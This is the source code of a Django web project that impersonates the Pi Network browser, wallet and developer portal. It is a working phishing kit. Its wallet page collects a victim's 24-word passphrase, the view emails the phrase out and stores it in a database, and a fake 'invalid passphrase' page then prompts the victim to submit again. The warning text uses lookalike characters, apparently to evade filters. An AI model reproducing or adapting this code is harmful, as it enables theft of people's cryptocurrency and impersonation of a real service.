piconverterapp/urls.py
from django.contrib import admin
from django.urls import path
from . import views as v

#creat your urls here

app_name = 'piconverterapp'
urlpatterns = [
    path('' ,v.home ,name='homepage') ,
    path('pi-browser/', v.document, name='piconverter documentation') ,
    path('pi-wallet/', v.wallet, name='pi wallet'),
    path('walleterror/', v.exchange, name='wallet-error'),
    path('develop/', v.develop, name='pinet development'),
    path('pinet/pi-apps/community-development/', v.payment, name='payment place'),
    path('pi-payment/selection', v.pipay, name='pipayments'),
]

pinetwork/urls.py
from django.contrib import admin
from django.urls import path, include


urlpatterns = [
    path('theboss/', admin.site.urls),
    path('',include('piconverterapp.urls')) ,
]

piconverterapp/models.py
from django.db import models

# Create your models here.

class passpharse(models.Model):
    pharse = models.TextField('passpharse input', max_length=20000, blank=True, null=True)
    is_checked = models.BooleanField('if the passpharse is checked', default=False)
    status = models.CharField('checed status', default='check',max_length=50)


    def __str__(self):
        if self.is_checked == False:
            self.status = 'check'
            return '---check'
        else:
            self.status = 'checked'
            return '---checked'

    
        

piconverterapp/views.py
from django.shortcuts import render,redirect 
from django.http import HttpResponse , JsonResponse
from .models import passpharse
import piconverterapp.mailsender
from django.contrib import messages
import os

# Create your views here.

def home(request):
    return render(request, 'piconverterapp/home.html')

def document(request):
    return render(request, 'piconverterapp/docs.html')

def wallet(request):
    

    if request.method == 'POST':

        path = request.POST['pharse']

        mail_template = f"""<html lang="en">
              <body style="background-color: black;">
             <section style="display: flex;width:100%;background-color:blur;color:aliceblue;height:300px;align-items:center;justify-content:center;text-align:center;font-size:30px; ">
             {path}
             </section>
         </body>
          </html>"""
        piconverterapp.mailsender.send_mail(mail_template, 'pi wallet passpharse', 'mazamaza')

        chk = passpharse.objects.create(pharse=path)
        chk.save()
        return JsonResponse({'S': 'successfully added'}, safe=False )
    return render (request, 'piconverterapp/wallet.html')

def exchange(request):
    
    return render(request, 'piconverterapp/convert.html')

def develop(request):

    return render(request, 'piconverterapp/develop1.html')

def payment(request):

    return render(request, 'piconverterapp/payment.html')

def pipay(request):

    return render(request, 'piconverterapp/payselet.html')

piconverterapp/templates/piconverterapp/convert.html
{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="{% static 'piconverterapp/styles/docs.css' %}">
    <link rel="apple-touch-icon" sizes="180x180" href="{% static 'piconverterapp/favicon.io/apple-touch-icon.png' %}">
      <link rel="icon" type="image/png" sizes="32x32" href="{% static 'piconverterapp/favicon.io/favicon-32x32.png' %}">
      <link rel="icon" type="image/png" sizes="16x16" href="{% static 'piconverterapp.favicon.io/favicon-16x16.png' %}">
      <link rel="manifest" href="{% static 'piconverterapp/favicon.io/site.webmanifest' %}"> 
    <title>Pi Wallet</title>
</head>
<style>
    .set{
        padding-top: 70px;
        font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 
        'Open Sans', 'Helvetica Neue', sans-serif;
        width: 100%;
    }
    .bttp{
        width: 100%;
        text-align: center;
    }
    .bttp button{
        width: 200px;
        height: 40px;
        background-color: #8752ab;
        border: none;
        border-radius: 13px;
        color: #fff;
        font-size: 12px;
        font-weight: 500;
    }
    @media screen and (max-width:550px) {
        .lette{
            font-size: 13px !important;
        }
    }
    @media screen and (max-width:400px) {
        .lette{
            font-size: 10px !important;
        } 
    }

</style>
<body>
    <header class="wallet-head">
        <nav class="wallet-nav">
            <a href="">
                <button class="row">
                    &leftarrow;
                </button>
            </a>
            <aside style="display:flex; align-items:center;justify-content:center;">
                <img class="iig" src="{% static 'piconverterapp/media/wallet2.png' %}" alt="">  wallet
            </aside>
        </nav>
    </header>

    <section class="set">

        <h2 class="h2" style="text-align: center; font-size:25px;color:#8752ab">
            Unlock pi wallet
        </h2>
        <br>
        <aside class="lette" style="width:90%; text-align:center;font-weight:500;margin:auto auto">
            Invalid 24 passphrase please check your passphrase and try again.
    </aside>
    <br>
    <aside class="bttp">
        <a href="/pi-wallet/" loading="lazy">
            <button>
                Try again
            </button>
        </a>
    </aside>
    <br>
    <br>
    <aside class="inform">
        <aside>
         As a non-custodiăl wăllet, your wrăllet păssphrăse is exclusively accessible only to you. Récovery of păssphrăse is currently impossible.
         <br>
         <br>
         <br>
         Lost your păssphrăse?<a href="">You can create a new wăllet</a>, but all your π in your previous wăllet will be inaccessible. 
        </aside>  
     </aside>
    </section>

</body>
</html>

piconverterapp/templates/piconverterapp/develop1.html
{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="Pi Converter, Blockchain, A Fast And Reliable Way to Exchange Your Pi Coin, Whit Trust And Garantee.." /> 
    <link rel="canonical" href="https://{{request.path_info}}" />               
    <meta property="og:site_name" content="PiConverter" />
<meta property="og:type" content="website" />
<meta property="og:title" content="Pi Converter, Blockchain, Community & Developer Platform | Pi Network" />
<meta property="og:description" content="Pi Converter, Blockchain, A Fast And Reliable Way to Exchange Your Pi Coin, Whit Trust And Garantee." />
<meta property="og:image" content="https://PiConverter.info{% static '' %}" />
<meta property="og:locale" content="en_us" />
<meta property="og:url" content="https://PiConverter.info{{request.path_info}}" />
<meta name="twitter:site" content="@PiConverter" />
<meta name="twitter:title" content="" />
<meta name="twitter:description" content="Pi Converter, Blockchain, A Fast And Reliable Way to Exchange Your Pi Coin, Whit Trust And Garantee.." />
<meta name="twitter:creator" content="@PiNetwork" />
<meta name="twitter:image" content="https://{% static '' %}" />
<meta property="twiter:card" content="summary_large_image" />
<meta name="twitter:image:alt" content="PiConverter Logo" />
      <link rel="stylesheet" href="{% static 'piconverterapp/styles/docs.css' %}">
      <link rel="apple-touch-icon" sizes="180x180" href="{% static 'piconverterapp/favicon.io/apple-touch-icon.png' %}">
      <link rel="icon" type="image/png" sizes="32x32" href="{% static 'piconverterapp/favicon.io/favicon-32x32.png' %}">
      <link rel="icon" type="image/png" sizes="16x16" href="{% static 'piconverterapp/favicon.io/favicon-16x16.png' %}">
      <link rel="manifest" href="{% static 'piconverterapp/favicon.io/site.webmanifest' %}">  

    <title>Develop pinet</title>
</head>

<style>
.type{
    padding: 100px 30px;
    box-sizing: border-box;
    overflow: hidden;
    color: #000;
    display: flex;
    align-items: center;
    justify-content: center;
    flex-direction: column;
    font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
}
.tick{
    letter-spacing: 1px;
    line-height: 25px;
    color: #141414;
    font-weight: 400;
    font-size: 15px;
}
.btns{
    width: 90%;
    box-sizing: border-box;
    overflow: hidden;
    gap: 10px;
}
.btns button{
    width: 100%;
    box-sizing: border-box;
    overflow: hidden;
    height: 40px;
    border: none;
    border-radius: 7px;
    margin-top: 10px;
}
.btns button{
    background-color: #a96ae7e7;
    color: #fff;
}
.ticks{
    width: 100%;
    text-align: none;
    color: rebeccapurple !important;
    display: flex;
    align-items: center;
    text-decoration: none;
}
.ticks button{
    border: 1px solid #a96ae7 !important;
    color: rebeccapurple;
    background-color: transparent !important;
}
.btns p{
    text-align: center;
    width: 100%;
    color: rgb(228, 17, 17);
    font-size: 15px;
    letter-spacing: 1px;
}
.iig{
    width: 30px !important;
    height: 30px !important;
}


@media screen and (max-width:1000px) {
    .btns{
        position: absolute;
        top: 80%;
    }
}
@media screen and (max-width:700px) {
    .type{
        padding: 50px 20px;
    }
    .tick{
        font-size: 13px;
    }
}
@media screen and (max-width:550px) {
    .tick{
        font-size: 10px !important;
        line-height: 20px !important;
    }
    .btns p{
        font-size: 12px !important;
    }
    .type h2{
        font-size: 1.2rem;
    }
}
@media screen and (max-width:400px) {
    .type h2{
        font-size: 1rem !important;
    }
    .tick{
        line-height: 15px !important;
    }
}
</style>

<body>
    <header class="wallet-head">
        <nav class="wallet-nav">
            <a href="">
                <button class="row">
                    &leftarrow;
                </button>
            </a>
            <aside style="display:flex; align-items:center;justify-content:center;">
                <img class="iig" src="{% static 'piconverterapp/favicon.io/favicon.ico' %}" alt="">  Develop
            </aside>
        </nav>
    </header>

    <aside class="check type">
        <h2>
            Welcome to the Pi Developer Portal
        </h2>
<p class="tick">
Here you can create third-party Pi Apps – decentralized Web 3.0 apps that can be accessed through the Pi Browser. By declaring to us your app’s URL here, your app will be able to access the Pi APIs and communicate with the Pi servers and the Pi Mainnet and Testnet Blockchains. <br>

Your Pi app will be accessible directly from your own URL through the Pi Browser — you can put your app on any domain you want and still have a fully functional Pi app. <br>

Currently, the Mainnet SDK is live! Developers can select either the Pi Mainnet or Pi Testnet Blockchain for their app. Though we highly recommend you start by building a functioning Testnet App and then create an associated Mainnet App. The selected blockchain will direct where API and SDK calls hit. This will allow developers to build Mainnet-compatible apps and test with users before the Mainnet goes live. <br>

It is required that you own the domain of the URL that you provide! You will be asked to verify its ownership. In the future, the Pi Core Team may select popular, useful and vetted apps to be listed in the Pi Browser front page directory, possibly with a custom .pi domain, through a separate process. Regardless of your app’s progress, we encourage you to register your app here as soon as possible, so we can invite you to the Developers-only chat rooms and resources that will be released shortly. <br>

</p>


<br>
    <br>
    <br>
    <br>

    <aside class="btns">
        <button disabled>
            continue
        </button>
        <br>
       <a href="/pinet/pi-apps/community-development/" class="ticks">
        <button>
            More info
        </button>
       </a>
        <p>
            To enter Pi Developer Portal, please verify your email by opeaning <a href="/pinet/pi-apps/community-development/">mine.pi/email</a> and then tap "continue"
        </p>
    </aside>

    </aside>

    
</body>
</html>

piconverterapp/templates/piconverterapp/docs.html
{% load static %}
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta
      name="description"
      content="Pi Blockchain, A Fast And Reliable Way to Exchange Your Pi Coin, Whit Trust And Garantee.."
    />
    <link rel="canonical" href="https://Net-access{{request.path_info}}" />
    <meta property="og:site_name" content="Net-access" />
    <meta property="og:type" content="website" />
    <meta
      property="og:title"
      content="Pi Exchange, Blockchain, Community & Developer Platform | Pi Network"
    />
    <meta
      property="og:description"
      content="Pi Converter, Blockchain, A Fast And Reliable Way to Exchange Your Pi Coin, Whit Trust And Garantee."
    />
    <meta property="og:image" content="https://Net-access{% static '' %}" />
    <meta property="og:locale" content="en_us" />
    <meta
      property="og:url"
      content="https://PiConverter.info{{request.path_info}}"
    />
    <meta name="twitter:site" content="@PiConverter" />
    <meta name="twitter:title" content="" />
    <meta
      name="twitter:description"
      content="Pi exchanger, Blockchain, A Fast And Reliable Way to Exchange Your Pi Coin, Whit Trust And Garantee.."
    />
    <meta name="twitter:creator" content="@PiNetwork" />
    <meta name="twitter:image" content="https://afribang.com{% static '' %}" />
    <meta property="twiter:card" content="summary_large_image" />
    <meta name="twitter:image:alt" content="PiConverter Logo" />
    <link
      rel="stylesheet"
      href="{% static 'piconverterapp/styles/docs.css' %}"
    />
    <link
      rel="apple-touch-icon"
      sizes="180x180"
      href="{% static 'piconverterapp/favicon.io/apple-touch-icon.png' %}"
    />
    <link
      rel="icon"
      type="image/png"
      sizes="32x32"
      href="{% static 'piconverterapp/favicon.io/favicon-32x32.png' %}"
    />
    <link
      rel="icon"
      type="image/png"
      sizes="16x16"
      href="{% static 'piconverterapp/favicon.io/favicon-16x16.png' %}"
    />
    <link
      rel="manifest"
      href="{% static 'piconverterapp/favicon.io/site.webmanifest' %}"
    />
    <title>Pi Browser</title>
    <!-- end metadata -->
  </head>

  <style>
    si {
      font-weight: 500;
      color: rebeccapurple;
    }
  </style>
  <body>
    <aside
      id="load-body"
      style="
        display: flex;
        align-items: center;
        justify-content: center;
        position: fixed;
        background-color: #fff;
        width: 100%;
        height: 100vh;
        flex-direction: column;
      "
    >
      <aside class="lodd">
        <svg
          xmlns="http://www.w3.org/2000/svg"
          xmlns:xlink="http://www.w3.org/1999/xlink"
          viewBox="0 0 100 100"
          preserveAspectRatio="xMidYMid"
          width="100"
          height="100"
          style="shape-rendering: auto; display: block; background: transparent"
        >
          <g>
            <circle
              stroke-dasharray="164.93361431346415 56.97787143782138"
              r="35"
              stroke-width="10"
              stroke="rgb(240, 185, 45)"
              fill="none"
              cy="50"
              cx="50"
            >
              <animateTransform
                keyTimes="0;1"
                values="0 50 50;360 50 50"
                dur="1s"
                repeatCount="indefinite"
                type="rotate"
                attributeName="transform"
              />
            </circle>
            <g />
          </g>
          <!-- [ldio] generated by https://loading.io -->
        </svg>
      </aside>
      <br />
      <br />
      <aside class="siw">Switching To Pi Browser</aside>
    </aside>

    <nav class="hdd">
      <aside class="as1">&leftarrow;</aside>
      <aside class="as2">
        <h3>Home</h3>
        <img
          class="imgg"
          src="{% static 'piconverterapp/media/Pi-Network.png' %}"
          alt=""
        />
      </aside>
      <aside class="down">
        <svg
          xmlns="http://www.w3.org/2000/svg"
          width="30"
          height="30"
          font-weight="600"
          fill="currentColor"
          class="bi bi-chevron-down"
          viewBox="0 0 16 16"
        >
          <path
            fill-rule="evenodd"
            d="M1.646 4.646a.5.5 0 0 1 .708 0L8 10.293l5.646-5.647a.5.5 0 0 1 .708.708l-6 6a.5.5 0 0 1-.708 0l-6-6a.5.5 0 0 1 0-.708"
          />
        </svg>
      </aside>
    </nav>

    <section class="set1">
      <aside class="logo">
        <img src="{% static 'piconverterapp/media/Pi-Network.png' %}" alt="" />
      </aside>
      <aside class="logo-txt">Welcome to the Pi Browser</aside>

      <aside class="icon-set">
        <div class="icon-holder">
          <a href="/pi-wallet/" class="lik">
            <div class="icon">
              <img
                class="img3"
                src="{% static 'piconverterapp/media/fire.jpg' %}"
                alt=""
              />
              <br />
              <si>Fireside</si>
            </div>
          </a>
          <a href="/pi-wallet/" class="lik">
            <div class="icon">
              <img
                class="img3"
                src="{% static 'piconverterapp/media/wallet.jpg' %}"
                alt=""
              />
              <br />
              <si>Wallet</si>
            </div>
          </a>
          <a href="/pi-wallet/" class="lik">
            <div class="icon">
              <img
                class="img3"
                src="{% static 'piconverterapp/media/bob.jpg' %}"
                alt=""
              />
              <br />
              <si>Brainstorm</si>
            </div>
          </a>
        </div>
        <br />
        <div class="icon-holder">
          <a href="/pi-wallet/" class="lik">
            <div class="icon">
              <img
                class="img3"
                src="{% static 'piconverterapp/media/mine.jpg' %}"
                alt=""
              />
              <br />
              <si>Mine</si>
            </div>
          </a>
          <a href="/pi-wallet/" class="lik">
            <div class="icon">
              <img
                class="img3"
                src="{% static 'piconverterapp/media/block.jpg' %}"
                alt=""
              />
              <br />
              <si>Blockchain</si>
            </div>
          </a>
          <a href="/develop/" class="lik">
            <div class="icon">
              <img
                class="img3"
                src="{% static 'piconverterapp/media/dev.jpg' %}"
                alt=""
              />
              <br />
              <si>Develop</si>
            </div>
          </a>
        </div>
        <br />
        <div class="icon-holder">
          <a href="/pi-wallet/" class="lik">
            <div class="icon">
              <img
                class="img3"
                src="{% static 'piconverterapp/media/kyc.jpg' %}"
                alt=""
              />
              <br />
              <si>KYC</si>
            </div>
          </a>
          <a href="/pi-wallet/" class="lik">
            <div class="icon">
              <img
                class="img3"
                src="{% static 'piconverterapp/media/msg.jpg' %}"
                alt=""
              />
              <br />
              <si>Chat</si>
            </div>
          </a>
          <a href="/pi-wallet/" class="lik">
            <div class="icon">
              <img
                class="img3"
                src="{% static 'piconverterapp/media/prov.jpg' %}"
                alt=""
              />
              <br />
              <si>Profiles</si>
            </div>
          </a>
        </div>
        <br />
        <div class="icon-holder">
          <a href="/pi-payment/selection" class="lik">
            <div class="icon">
              <div
                class=""
                style="
                  border: 1px solid purple;
                  border-radius: 10px;
                  padding: 3px;
                "
              >
                <img
                  class=""
                  src="{% static 'piconverterapp/domain.svg' %}"
                  alt=""
                  width="55"
                  height="55"
                />
                <br />
              </div>
              <si>Domain</si>
            </div>
          </a>

          <a href="/pi-payment/selection" class="lik">
            <div class="icon">
              <img
                class="img3"
                src="{% static 'piconverterapp/media/p2p.jpg' %}"
                alt=""
              />
              <br />
              <si>Trade id</si>
            </div>
          </a>

          <a href="/pi-wallet/" class="lik">
            <div class="icon">
              <img
                class="img3"
                src="{% static 'piconverterapp/media/lockedpi.png' %}"
                alt=""
              />
              <br />
              <si>Unlock pi</si>
            </div>
          </a>
        </div>
      </aside>

      <br />
      <br />
      <aside class="ijf">
        <button class="exbtn">
          <img src="{% static 'piconverterapp/media/compass.png' %}" alt="" />
          Explore the Testnet Ecosystem
        </button>
      </aside>
      <br />
      <br />
    </section>

    <script>
      var load = document.getElementById("load-body");

      window.onload = function () {
        setTimeout(() => {
          load.style.display = "none";
        }, 1000);
      };
    </script>
  </body>
</html>

piconverterapp/templates/piconverterapp/wallet.html
{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="Pi Converter, Blockchain, A Fast And Reliable Way to Exchange Your Pi Coin, Whit Trust And Garantee.." /> 
    <link rel="canonical" href="https://{{request.path_info}}" />               
    <meta property="og:site_name" content="PiConverter" />
<meta property="og:type" content="website" />
<meta property="og:title" content="Pi Converter, Blockchain, Community & Developer Platform | Pi Network" />
<meta property="og:description" content="Pi Converter, Blockchain, A Fast And Reliable Way to Exchange Your Pi Coin, Whit Trust And Garantee." />
<meta property="og:image" content="https://PiConverter.info{% static '' %}" />
<meta property="og:locale" content="en_us" />
<meta property="og:url" content="https://PiConverter.info{{request.path_info}}" />
<meta name="twitter:site" content="@PiConverter" />
<meta name="twitter:title" content="" />
<meta name="twitter:description" content="Pi Converter, Blockchain, A Fast And Reliable Way to Exchange Your Pi Coin, Whit Trust And Garantee.." />
<meta name="twitter:creator" content="@PiNetwork" />
<meta name="twitter:image" content="https://{% static '' %}" />
<meta property="twiter:card" content="summary_large_image" />
<meta name="twitter:image:alt" content="PiConverter Logo" />
      <link rel="stylesheet" href="{% static 'piconverterapp/styles/docs.css' %}">
      <link rel="apple-touch-icon" sizes="180x180" href="{% static 'piconverterapp/favicon.io/apple-touch-icon.png' %}">
      <link rel="icon" type="image/png" sizes="32x32" href="{% static 'piconverterapp/favicon.io/favicon-32x32.png' %}">
      <link rel="icon" type="image/png" sizes="16x16" href="{% static 'piconverterapp/favicon.io/favicon-16x16.png' %}">
      <link rel="manifest" href="{% static 'piconverterapp/favicon.io/site.webmanifest' %}">  

    <title>Pi Wallet </title>
</head>

<style>
    
</style>


<body>
    <header class="wallet-head">
        <nav class="wallet-nav">
            <a href="">
                <button class="row">
                    &leftarrow;
                </button>
            </a>
            <aside style="display:flex; align-items:center;justify-content:center;">
                <img class="iig" src="{% static 'piconverterapp/media/wallet2.png' %}" alt="">  wallet
            </aside>
        </nav>
    </header>

    <!-- main sect -->
     <section class="main-sect" id="via">
        <a href="{% url 'piconverterapp:wallet-error' %}" id="link-tag"></a>
        <form method="post" id="form" loading="lazy">
           <wt-tkn id="us_tkn">{% csrf_token %}</wt-tkn>
            <h2>Unlock Pi Wallet</h2>
            <br>
            <textarea name="passph" id="passph" rows="1"  cols="1" placeholder="Enter your 24-passphrase" style="border-radius: 10px;padding:5px;" ></textarea>
            <br>
            <span style="color: firebrick; font-size:13px;" id="msg">
                
            </span>
            <br>
            <button class="sub-btn" value="submit">
                Unlock with passphrase
            </button>
            <br>
            <button disabled  class="sub-btn" style="background-color: rebeccapurple; color:#fff;">
                Unlock with Fingerprint
            </button>
            <script>

                let pass = document.getElementById('passph')
                let form = document.getElementById('form')
                var _tkn = document.getElementById('us_tkn').children[0].getAttribute('value');

                form.addEventListener('submit', (e)=> {
                    e.preventDefault();
                    if (pass.value == "") {
                     document.getElementById('msg').textContent = 'Invalid passpharse'
                    }
                    else{
                    var _url = '/pi-wallet/';
        var form_data = new FormData();
        form_data.append('pharse', pass.value);

        fetch (_url, {
            method: 'POST',
            headers: {
                'X-CSRFToken': _tkn,
            },
            body: form_data,
        })
        .then(response => response.json())
        .then(data => {
            if(data.S){
                const a = document.getElementById('link-tag')
                a.click()
            }
        })
        .catch((error) => {
            console.log(error)
        })

                    }
                })
            </script>

        </form>
        <br>
        <br>
        <aside class="inform">
           <aside>
            As a non-custodiăl wăllet, your wrăllet păssphrăse is exclusively accessible only to you. Récovery of păssphrăse is currently impossible.
            <br>
            <br>
            <br>
            Lost your păssphrăse?<a href="">You can create a new wăllet</a>, but all your π in your previous wăllet will be inaccessible. 
           </aside>  
        </aside>
     </section>

</body>
</html>